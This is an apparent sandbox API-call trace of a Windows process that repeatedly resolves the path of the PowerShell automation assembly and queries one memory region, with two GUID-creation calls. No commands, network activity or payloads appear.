	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.604] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.604] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.605] VirtualQuery (in: lpAddress=0xcbe70, lpBuffer=0xccd30, dwLength=0x30 | out: lpBuffer=0xccd30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.605] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.605] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.606] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.606] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.607] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.608] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.608] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.639] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.639] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.639] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.639] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] VirtualQuery (in: lpAddress=0xcbaa0, lpBuffer=0xcc960, dwLength=0x30 | out: lpBuffer=0xcc960*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] VirtualQuery (in: lpAddress=0xcbdd0, lpBuffer=0xccc90, dwLength=0x30 | out: lpBuffer=0xccc90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] VirtualQuery (in: lpAddress=0xcbe60, lpBuffer=0xccd20, dwLength=0x30 | out: lpBuffer=0xccd20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.640] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xd731f659, Data2=0x7c55, Data3=0x471d, Data4=([0]=0x8a, [1]=0x3b, [2]=0xa2, [3]=0xf7, [4]=0xd5, [5]=0x4a, [6]=0x68, [7]=0x6c))) returned 0x0
	[0285.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.642] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x4cfb663a, Data2=0xe3ff, Data3=0x4cff, Data4=([0]=0x8c, [1]=0xe, [2]=0xd9, [3]=0xf1, [4]=0xc5, [5]=0x65, [6]=0xb8, [7]=0xf0))) returned 0x0
	[0285.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.645] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.646] VirtualQuery (in: lpAddress=0xcb4d0, lpBuffer=0xcc390, dwLength=0x30 | out: lpBuffer=0xcc390*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.646] VirtualQuery (in: lpAddress=0xcb560, lpBuffer=0xcc420, dwLength=0x30 | out: lpBuffer=0xcc420*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
